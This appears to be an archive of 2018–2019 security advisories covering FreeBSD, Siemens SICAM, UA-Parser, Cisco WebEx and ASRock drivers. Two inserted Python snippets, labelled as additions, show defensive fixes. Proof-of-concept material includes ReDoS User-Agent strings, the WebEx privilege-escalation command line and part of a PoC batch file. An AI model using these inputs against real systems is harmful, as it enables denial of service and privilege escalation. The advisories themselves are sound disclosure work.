The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:02.fd.asc>
-BEGIN PGP SIGNATURE-
FreeBSD Security Advisory FreeBSD-SA-19:01.syscall

2019-02-05 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:01.syscallSecurity Advisory
  The FreeBSD Project

Topic:  System call kernel data register leak

Category:   core
Module: kernel
Announced:  2019-02-05
Credits:Konstantin Belousov
Affects:All supported versions of FreeBSD.
Corrected:  2019-02-05 17:52:06 UTC (stable/12, 12.0-STABLE)
2019-02-05 18:05:05 UTC (releng/12.0, 12.0-RELEASE-p3)
2019-02-05 17:54:02 UTC (stable/11, 11.2-STABLE)
2019-02-05 18:07:45 UTC (releng/11.2, 11.2-RELEASE-p9)
CVE Name:   CVE-2019-5595

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The FreeBSD/amd64 architecture defines the SYSCALL instruction for syscalls,
and uses a register calling convention for passing syscall arguments and
return values in addition to the register usage imposed by the SYSCALL and
SYSRET instructions in long mode.  In particular, the arguments are passed in
the registers specified by the C ABI, and the content of the registers
specified as caller-save is undefined after the return from a syscall.

II.  Problem Description

The callee-save registers are used by the kernel, and for some of them (%r8,
%r10, and for non-PTI configurations, %r9) the content is not sanitized before
return from syscalls, potentially leaking sensitive information.

III. Impact

Typically an address of some kernel data structure used in the syscall
implementation is exposed.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10m "Rebooting for security update"

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.patch
# fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.patch.asc
# gpg --verify syscall.patch.asc

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.11.2.patch.asc
# gpg --verify syscall.11.2.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path      Revision
-------------------------
stable/12/       r343781
releng/12.0/     r343788
stable/11/       r343782
releng/11.2/     r343789
-------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5595>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:01.syscall.asc>
-BEGIN PGP SIGNATURE-
CVE-2018-13798 Siemens - SICAM A8000 Series Webinterface XXE DoS

2019-01-16 Thread Advisories
#
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#
#
# Product:  SICAM A8000 Series
# Vendor:   Siemens
# CSNC ID:  CSNC-2019-002
# CVE ID:   CVE-2018-13798
# Subject:  SICAM Webinterface XXE DoS
# Risk: Medium (CVSS 3.0 Base Score: 5.3)
# CVSS 3.0: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C
# Effect:   Unauthenticated remotely exploitable
# Authors:  Emanuel Duss 
#   Nicolas Heiniger 
# Date: 2019-01-14
#
#

Introduction


The Siemens SICAM A8000 RTU (Remote Terminal Unit) series is a modular device
range for telecontrol and automation applications in all areas of energy
supply. This device offers a web management interface for performing simple
management tasks.

During a penetration test, Compass found a denial-of-service vulnerability in
the Siemens SICAM web server. The web management interface is vulnerable
against the XXE billion laughs attack [2] using XML entities. Successful
exploitation can be performed unauthenticated over the network.

Affected


* SICAM A8000 CP-8000 < V14
* SICAM A8000 CP-802X < V14
* SICAM A8000 CP-8050 < V2.00

Technical Description
-

When a login on the web management interface is performed, the following
request is sent to the server:

POST /sicweb-ajax/auth HTTP/1.1
Host: 10.5.23.42
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 
Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.5.23.42
Content-Type: application/xml
Content-Length: 118
Connection: close




By modifying the XML message, it's possible to perform a billion laughs denial
of service attack against the web management interface:

POST /sicweb-ajax/auth HTTP/1.1
Host: 10.5.23.42
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 
Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.5.23.42/
Content-Type: application/xml
Content-Length: 1679
Connection: close



  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
]>



The XML parser on the device tries to resolve the external entities. This will
consume all available memory and the web management interface does not respond
anymore.

If the web management interface is refreshed in the browser, the following
message appears:

The device is currently unreachable. Retrying to connect.

Other services on the device, like the one used by the ToolboxII for
configuring the device or the IEC104 service, will still work properly and are
not affected by this attack. Only the web management interface remains unusable
until the device is rebooted.

It's not possible to use XXE to read local or remote files using the SYSTEM
directive.
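The mitigation the device needs is to refuse any DTD before entity expansion can begin. The following Python, added here as an illustration and not code from Siemens or from Compass, parses a small login-style XML body with a DOCTYPE and entity-declaration handler that aborts immediately, plus a size cap; the sample request bodies are constructed, since the advisory's own are not reproduced.

```python
from typing import Dict, List
from xml.parsers import expat


class DtdRejected(ValueError):
    """Raised when the request carries a DOCTYPE or an entity declaration."""


def parse_auth_request(data: bytes, max_bytes: int = 4096) -> Dict[str, str]:
    """Parse a small XML request body into {element name: text}.

    Entity expansion only happens when a DTD declares entities, so refusing
    the DOCTYPE before its subset is processed removes the billion-laughs
    vector. The size cap bounds the work done on anything that is parsed.
    """
    if len(data) > max_bytes:
        raise ValueError(f"request body exceeds {max_bytes} bytes")

    parser = expat.ParserCreate()
    fields: Dict[str, str] = {}
    open_tags: List[str] = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires at '<!DOCTYPE', before any entity in the subset is seen.
        raise DtdRejected(f"DOCTYPE {name!r} is not allowed")

    def on_entity_decl(*_args):
        raise DtdRejected("entity declarations are not allowed")

    def on_start(tag, _attrs):
        open_tags.append(tag)
        fields.setdefault(tag, "")

    def on_end(_tag):
        open_tags.pop()

    def on_text(text):
        # expat may deliver one text node in several chunks; concatenate them.
        if open_tags:
            fields[open_tags[-1]] += text

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_text
    parser.Parse(data, True)  # exceptions raised in handlers propagate here
    return fields


def is_rejected(data: bytes) -> bool:
    """True when the parser refuses the body because it carries a DTD."""
    try:
        parse_auth_request(data)
    except DtdRejected:
        return True
    return False


# Constructed samples (element names are assumptions, not the device's).
BENIGN_LOGIN = b"<auth><user>operator</user><password>secret</password></auth>"
NESTED_ENTITIES = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE auth [<!ENTITY a "x"><!ENTITY b "&a;&a;&a;">]>'
    b"<auth><user>&b;</user></auth>"
)

if __name__ == "__main__":
    print("benign:", parse_auth_request(BENIGN_LOGIN))
    print("nested entities rejected:", is_rejected(NESTED_ENTITIES))
```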

Vulnerability Classification


* CVSS v3.0 Base Score: 5.3
* CVSS v3.0 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C

Remediation
---

* SICAM A8000 CP-8000: Update to V14
* SICAM A8000 CP-802X: Update to V14
* SICAM A8000 CP-8050: Update to V2.00 or higher

Please see the Siemens advisory [3] for the download links.

As a workaround, it's also possible to restrict the access to the webserver on
port 80/tcp and 443/tcp using a firewall.

Acknowledgments
---

We thank Siemens for the coordinated disclosure.

Timeline


2018-05-28:Vulnerability discovered by Emanuel Duss and Nicolas Heiniger
2018-05-28:Informed customer
2018-06-06:Initial vendor notification
2018-03-18:Vendor informed us that they will publish an advisory
2019-01-08:Siemens published advisory [3]
2019-01-11:Compass published advisory containing technical information

References
--

[1] https://w3.siemens.com/smartgrid/global/en/products-systems-solutions/substation-automation/substation-automation/pages/sicam-a8000.aspx
[2] https://www.owasp.org/index.php/XML_Security_Cheat_Sheet#Billion_Laughs
[3] https://cert-portal.siemens.com/productcert/txt/ssa-579309.txt


X41 D-Sec GmbH Security Advisory X41-2018-009: ReDoS Vulnerability in UA-Parser

2019-01-10 Thread X41 D-Sec GmbH Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-SEC GmbH Security Advisory: X41-2018-009

ReDoS Vulnerability in UA-Parser

Severity Rating: Medium
Confirmed Affected Versions: 2015-05-14 and newer, commit
6fd6c261274254bcbbacd77ef4b12534c7f9923d
Confirmed Patched Versions: v0.6.0 released 2018-12-14, commit
010ccdc7303546cd22b9da687c29f4a996990014
Vendor: UA-Parser Project
Vendor URL: https://github.com/ua-parser
Vector: HTTP request
Credit: X41 D-SEC GmbH, Luc Gommans
Status: Public
CVE: CVE-2018-20164
CVSSv3 Score: 5.3
CVSSv3 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2018-009-uaparser/

Summary and Impact
==
The programming library UA-Parser uses regular expressions to identify
user agent strings. The complexity of some of the regular expressions
is such that an attacker can craft special patterns that keep the
server busy for a long time. By sending many requests in short order,
an attacker can exhaust the amount of processing power available. This
causes the website to become unavailable for legitimate visitors.

In common setups, the user agent string is parsed whenever a page is
visited. This means that anyone can abuse the bug, typically without
authentication. There are no common circumstances which would prevent
an attack from working reliably, i.e. an attacker can consistently and
repeatedly exploit the issue until the site has become unreachable.
For more information on regular expression-based denial of service,
see the OWASP page on ReDoS:

https://www.owasp.org/index.php/RegularexpressionDenialofService-ReDoS

The UA-Parser project consists of a core repository, uap-core, and
implementations in various languages. The regular expressions are
defined in the core project and each implementation is automatically
vulnerable.

Product Description
===
When a user agent (such as a browser) connects to a website, it
identifies itself with a 'user agent string'. This string helps the
server determine relevant content, for example to serve the
appropriate installer for visitors with different operating systems.
The UA-Parser project collects regular expressions that extract the
type of device and operating system from these strings.
Implementations in different languages are automatically vulnerable,
including the reference implementation in JavaScript:
<https://github.com/ua-parser/uap-ref-impl>

Proof of Concept

There are multiple vulnerable regular expressions. They are collected
in the file regex.yaml, for example on lines 911 and 4961. The regular
expression on line 911 is as follows:

   (x86_64|aarch64)\ (\d+)+\.(\d+)+\.(\d+)+.*Chrome.*(?:CitrixChromeApp)$

Any implementation using this library will hang for a few seconds (on
commodity hardware) when the following HTTP request is sent:

GET / HTTP/1.0
User-Agent: x86_64 

Normal user agent strings can be over a hundred bytes long: this
string of 35 bytes is not an abnormal request. Adding one more byte
makes the processing significantly longer.
This particular regular expression was introduced in September 2018. The
regular expression on line 4961 was introduced in May 2015 and can be
exploited as follows:

GET / HTTP/1.0
User-Agent:
HbbTV/1.1.1CE-HTML/1.1;THOM;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;LF

Each additional repetition of SW-Version/1; will multiply the
processing time by roughly a factor 6.2. Where eleven repetitions take
about seven seconds, fourteen repetitions already occupy a server for
half an hour.

Workarounds
===
As demonstrated, the input does not have to be particularly long to
exploit the issue. Very long input may also be a problem, and a few
hundred kilobytes may slow down most regular expressions, but limiting
the maximum length is not a solution by itself.
The root cause is the regular expression, which should be limited in
complexity. This involves manual work and there is no solution that
can be applied to all regular expressions in the project.

To aid in identifying problematic regular expressions, one may use
projects such as <https://github.com/jagracey/RegEx-DoS>.
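As an added example that is not part of the advisory or of the UA-Parser project, the following Python shows the review a regex.yaml change should get: flag a group that is itself repeated (the `(\d+)+` shape in the pattern quoted above), compare a candidate rewrite against the original on a legitimate user agent to confirm the captures are unchanged, and time both on a constructed non-matching input. The rewrite is an assumption for illustration, not the upstream v0.6.0 fix.

```python
import re
import time
from typing import Optional, Tuple

# Pattern quoted in the advisory (uap-core regex.yaml, line 911 at the time).
VULNERABLE = r"(x86_64|aarch64)\ (\d+)+\.(\d+)+\.(\d+)+.*Chrome.*(?:CitrixChromeApp)$"

# Constructed rewrite: each (\d+)+ collapses to (\d+). One or more runs of
# one-or-more digits is just one run of digits, so the accepted language and
# the captured values are unchanged, but the backtracking is gone.
HARDENED = r"(x86_64|aarch64)\ (\d+)\.(\d+)\.(\d+).*Chrome.*(?:CitrixChromeApp)$"

# Heuristic: a group whose body ends in + or * and which is itself repeated,
# e.g. (\d+)+ or (a*)*. It misses nested groups such as ((a+)b)+, so treat it
# as a triage filter for a regex.yaml review, not as a proof of safety.
_NESTED_QUANTIFIER = re.compile(r"\((?:[^()\\]|\\.)*[+*]\)[+*{]")


def has_nested_quantifier(pattern: str) -> bool:
    return _NESTED_QUANTIFIER.search(pattern) is not None


def match_groups(pattern: str, user_agent: str) -> Optional[Tuple[str, ...]]:
    """Capture groups the way a UA-Parser implementation consumes them."""
    m = re.search(pattern, user_agent)
    return m.groups() if m else None


def seconds_to_match(pattern: str, user_agent: str) -> float:
    """Wall-clock cost of one search, for comparing a rewrite against the
    original on the same non-matching input before shipping the change."""
    start = time.perf_counter()
    re.search(pattern, user_agent)
    return time.perf_counter() - start


if __name__ == "__main__":
    legit = "x86_64 70.0.3538 Chrome CitrixChromeApp"  # constructed
    print("same captures:",
          match_groups(VULNERABLE, legit) == match_groups(HARDENED, legit))
    # Constructed non-matching input: a digit run with no '.' after it makes
    # the first (\d+)+ try every partition of the run before giving up.
    probe = "x86_64 " + "1" * 16
    for name, pat in (("vulnerable", VULNERABLE), ("hardened", HARDENED)):
        print(f"{name:10s} nested={has_nested_quantifier(pat)} "
              f"time={seconds_to_match(pat, probe):.4f}s")
```

Lengthening the probe by one digit roughly doubles the vulnerable pattern's time while the hardened one stays flat, which is the property to check for every pattern the heuristic flags.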

Timeline

2018-11-26 Issue found.
2018-11-29 Permission from customer to disclose to upstream.
2018-11-29 Requested secure channel from vendor for communication.
2018-12-04 Disclosed to vendor.
2018-12-14 Patch released by vendor, CVE number requested.
2018-12-15 CVE-2018-20164 assigned.
2019-01-10 Advisory released.

About X41 D-SEC GmbH

X41 is an expert provider for application security services.
Having extensive industry experience and expertise in the area of
information security, a strong core security team of world class
security experts enables X41 to perform premium security services.
Fields of expertise in the area of applicat

FreeBSD Security Advisory FreeBSD-SA-18:15.bootpd

2018-12-19 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:15.bootpd Security Advisory
  The FreeBSD Project

Topic:  bootpd buffer overflow

Category:   core
Module: bootpd
Announced:  2018-12-19
Credits:Reno Robert
Affects:All supported versions of FreeBSD.
Corrected:  2018-12-19 18:17:59 UTC (stable/12, 12.0-STABLE)
2018-12-19 18:21:07 UTC (releng/12.0, 12.0-RELEASE-p1)
2018-12-19 18:19:15 UTC (stable/11, 11.2-STABLE)
2018-12-19 18:22:25 UTC (releng/11.2, 11.2-RELEASE-p7)
CVE Name:   CVE-2018-17161

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The bootpd utility implements an Internet Bootstrap Protocol (BOOTP)
server as defined in RFC951, RFC1532, and RFC1533.

II.  Problem Description

Due to insufficient validation of network-provided data it may be possible
for a malicious attacker to craft a bootp packet which could cause a stack
buffer overflow.

III. Impact

It is possible that the buffer overflow could lead to a Denial of Service
or remote code execution.

IV.  Workaround

Firewall rules may be used to limit reception of bootp packets to only
trusted networks or hosts.  Note that the bootp protocol is typically
limited to a common layer 2 broadcast domain, although the bootpgw gateway
can forward bootp requests and responses between subnets.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
Restart bootpd if it is running in standalone mode.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-18:15/bootpd.patch
# fetch https://security.FreeBSD.org/patches/SA-18:15/bootpd.patch.asc
# gpg --verify bootpd.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <https://www.FreeBSD.org/handbook/makeworld.html>.

Restart the applicable daemons, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path      Revision
-------------------------
stable/12/       r342228
releng/12.0/     r342230
stable/11/       r348229
releng/11.2/     r342231
-------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17161>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-18:15.bootpd.asc>
-BEGIN PGP SIGNATURE-
FreeBSD Security Advisory FreeBSD-SA-18:14.bhyve

2018-12-04 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:14.bhyve  Security Advisory
  The FreeBSD Project

Topic:  Insufficient bounds checking in bhyve(8) device model

Category:   core
Module: bhyve
Announced:  2018-12-04
Credits:Reno Robert
Affects:All supported versions of FreeBSD.
Corrected:  2018-12-04 18:32:50 UTC (stable/11, 11.2-STABLE)
2018-12-04 18:38:32 UTC (releng/11.2, 11.2-RELEASE-p6)
CVE Name:   CVE-2018-17160

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The bhyve hypervisor uses the bhyve(8) program to emulate support for most
virtual devices used by guest operating systems.

II.  Problem Description

Insufficient bounds checking in one of the device models provided by bhyve(8)
can permit a guest operating system to overwrite memory in the bhyve(8)
process, possibly permitting arbitrary code execution.

III. Impact

A guest OS using a firmware image can cause the bhyve process to crash, or
possibly execute arbitrary code on the host as root.

IV.  Workaround

The device model in question is only enabled when booting guests with a
firmware image such as the UEFI images from the bhyve-firmware package.
Guests booted using bhyveload(8) or grub2-bhyve are not affected.  Guests
using operating systems supported by bhyveload(8) or grub2-bhyve can be
booted using these tools as a workaround.

No workaround is available for guest operating systems such as Windows that
require a firmware image.

V.   Solution

Perform one of the following:

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, restart guests using firmware images.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-18:14/bhyve.patch
# fetch https://security.FreeBSD.org/patches/SA-18:14/bhyve.patch.asc
# gpg --verify bhyve.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <https://www.FreeBSD.org/handbook/makeworld.html>.

Afterward, restart guests using firmware images.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path      Revision
-------------------------
stable/11/       r341486
releng/11.2/     r341488
-------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17160>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-18:14.bhyve.asc>
-BEGIN PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-18:13.nfs

2018-11-27 Thread FreeBSD Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-18:13.nfsSecurity Advisory
  The FreeBSD Project

Topic:  Multiple vulnerabilities in NFS server code

Category:   core
Module: nfs
Announced:  2018-11-27
Credits:Jakub Jirasek, Secunia Research at Flexera
Affects:All supported versions of FreeBSD.
Corrected:  2018-11-23 20:41:54 UTC (stable/11, 11.2-STABLE)
2018-11-27 19:42:16 UTC (releng/11.2, 11.2-RELEASE-p5)
CVE Name:   CVE-2018-17157, CVE-2018-17158, CVE-2018-17159

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The Network File System (NFS) allows a host to export some or all of its file
systems so that other hosts can access them over the network and mount them
as if they were local.  FreeBSD includes both server and client
implementations of NFS.

II.  Problem Description

Insufficient and improper checking in the NFS server code could cause a
denial of service or possibly remote code execution via a specially crafted
network packet.

III. Impact

A remote attacker could cause the NFS server to crash, resulting in a denial
of service, or possibly execute arbitrary code on the server. 

IV.  Workaround

No workaround is available, but systems that do not provide NFS services are
not vulnerable.

Additionally, it is highly recommended the NFS service port (default port
number 2049) is protected via a host or network based firewall to prevent
arbitrary, untrusted clients from being able to connect.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Afterward, reboot the system.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterward, reboot the system.

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-18:13/nfs.patch
# fetch https://security.FreeBSD.org/patches/SA-18:13/nfs.patch.asc
# gpg --verify nfs.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path      Revision
-------------------------
stable/11/       r340854
releng/11.2/     r341088
-------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a
machine with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://www.flexerasoftware.com/enterprise/company/about/secunia-research/>

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17157>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17158>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17159>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-18:13.nfs.asc>
-BEGIN PGP SIGNATURE-
[CORE-2018-0011] - Cisco WebEx Meetings Elevation of Privilege Vulnerability

2018-11-27 Thread advisories
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

Cisco WebEx Meetings Elevation of Privilege Vulnerability

*1. *Advisory Information**

Title: Cisco WebEx Meetings Elevation of Privilege Vulnerability
Advisory ID: CORE-2018-0011
Advisory URL: 
http://www.secureauth.com/labs/advisories/cisco-webex-meetings-elevation-privilege-vulnerability
Date published: 2018-11-27
Date of last update: 2018-11-27
Vendors contacted: Cisco
Release mode: Coordinated release

2. *Vulnerability Information*

Class: OS command injection [CWE-78]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-15442

3. *Vulnerability Description*

Cisco's Webex Meetings website states that [1]:

Cisco Webex Meetings: Simply the Best Video Conferencing and Online
Meetings. With Cisco Webex Meetings, joining is a breeze, audio and
video are clear, and screen sharing is easier than ever. We help you
forget about the technology, to focus on what matters.

A vulnerability in the update service of Cisco Webex Meetings Desktop
App for Windows could allow a local attacker to elevate privileges. This
vulnerability is related to a previous security issue fixed by Cisco in
October.

4. *Vulnerable Packages*

   . Cisco Webex Meetings Desktop App releases prior to 33.6.4
   . Cisco Webex Productivity Tools releases 32.6.0 and later prior to 33.0.6

5. *Vendor Information, Solutions and Workarounds*

Cisco released a new fixed version and updated its security notice:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181024-webex-injection

6. *Credits*

This vulnerability was discovered and researched by Marcos Accossatto
from SecureAuth Exploits' Writers Team. The publication of this advisory
was coordinated by Leandro Cuozzo from SecureAuth Advisories Team.

7. *Technical Description / Proof of Concept Code*

7.1. *Privilege Escalation*

[CVE-2018-15442]
The update service of Cisco Webex Meetings Desktop App for Windows does
not properly validate user-supplied parameters. An unprivileged local
attacker could exploit this vulnerability by invoking the update service
command with a crafted argument. This will allow the attacker to run
arbitrary commands with SYSTEM user privileges.

The vulnerability can be exploited by copying the ptUpdate.exe binary to a
folder controlled by a local attacker. A malicious DLL named wbxtrace.dll
must also be placed in the same folder. To gain privileges, the attacker
must start the service with the command line: sc start webexservice install
software-update 1 "attacker-controlled-path" (if the parameter 1 doesn't
work, then 2 should be used).

Proof of Concept:

/-
REM Contents of PoC.bat
REM This batch will copy the ptUpdate.exe from the installation folder to the current folder
REM Then it will generate a simple dll that will execute notepad.exe on load. The dll will be created using certutil.exe and named wbxtrace.dll
REM Finally, the webexservice service will be started, with the shown parameters
REM The result should be a notepad.exe with SYSTEM user privileges
@echo off
:CheckOS
IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT)

:64BIT
copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\ptUpdate.exe" .
GOTO END

:32BIT
copy "%PROGRAMFILES%\Webex\Webex\Applications\ptUpdate.exe" .
GOTO END

:END

[CORE-2018-0005] - ASRock Drivers Elevation of Privilege Vulnerabilities

2018-10-29 Thread SecureAuth Advisories Team
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

ASRock Drivers Elevation of Privilege Vulnerabilities

1. *Advisory Information*

Title: ASRock Drivers Elevation of Privilege Vulnerabilities
Advisory ID: CORE-2018-0005
Advisory URL:
https://www.secureauth.com/labs/advisories/asrock-drivers-elevation-privilege-vulnerabilities
Date published: 2018-10-25
Date of last update: 2018-10-25
Vendors contacted: ASRock
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Exposed IOCTL with Insufficient Access Control [CWE-782], Exposed
IOCTL with Insufficient Access Control [CWE-782], Exposed IOCTL with
Insufficient Access Control [CWE-782], Exposed IOCTL with Insufficient
Access Control [CWE-782]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2018-10709, CVE-2018-10710, CVE-2018-10711, CVE-2018-10712

3. *Vulnerability Description*

ASRock's website states that [1]:

ASRock Inc. is established in 2002, specialized in the field of
motherboards. With the 3C design concept, Creativity, Consideration,
Cost-effectiveness, the company explores the limit of motherboards
manufacturing while paying attention on the eco issue at the same
time, developing products with the consideration of eco-friendly
concept. ASRock has been growing fast and become world third largest
motherboard brand with headquarter in Taipei, Taiwan and branches in
Europe and the USA.

ASRock offers several utilities designed to give the user with an ASRock
motherboard more control over certain settings and functions.
These utilities include various features like the RGB LED control,
hardware monitor, fan controls, and overclocking/voltage options.

Multiple vulnerabilities were found in AsrDrv101.sys and AsrDrv102.sys
low level drivers, installed by ASRock RGBLED and other ASRock branded
utilities, which could allow a local attacker to elevate privileges.

4. *Vulnerable Packages*

   . ASRock RGBLED before v1.0.35.1
   . A-Tuning before v3.0.210
   . F-Stream before v3.0.210
   . RestartToUEFI before v1.0.6.2

5. *Vendor Information, Solutions and Workarounds*

ASRock published the following fixed applications for each of its
motherboards models:
   
   . ASRock RGBLED v1.0.36
   . A-Tuning v3.0.216
   . F-Stream v3.0.216
   . RestartToUEFI v1.0.7

Downloads are available on the ASRock website.

6. *Credits*

These vulnerabilities were discovered and researched by Diego Juarez.
The publication of this advisory was coordinated by Leandro Cuozzo
from SecureAuth Advisories Team.

7. *Technical Description / Proof of Concept Code*

ASRock's RBGLED, A-Tuning, F-Stream, RestartToUEFI, and possibly others,
use a low level driver to program and query the status on embedded ICs
on their hardware. Fan curves, clock frequencies, LED colors, thermal
performance, and other user customizable properties and monitoring
functionality are exposed to applications through this low level kernel
driver.

The main subjects of this advisory are the device drivers
installed/loaded by these utilities (AsrDrv101.sys and AsrDrv102.sys),
referred to from now on as "AsrDrv". The default installation allows
non-privileged user processes (even running at LOW INTEGRITY) to get a
HANDLE and issue IOCTL codes to the driver.

The following sections describe the problems found.

7.1. *CR register access*

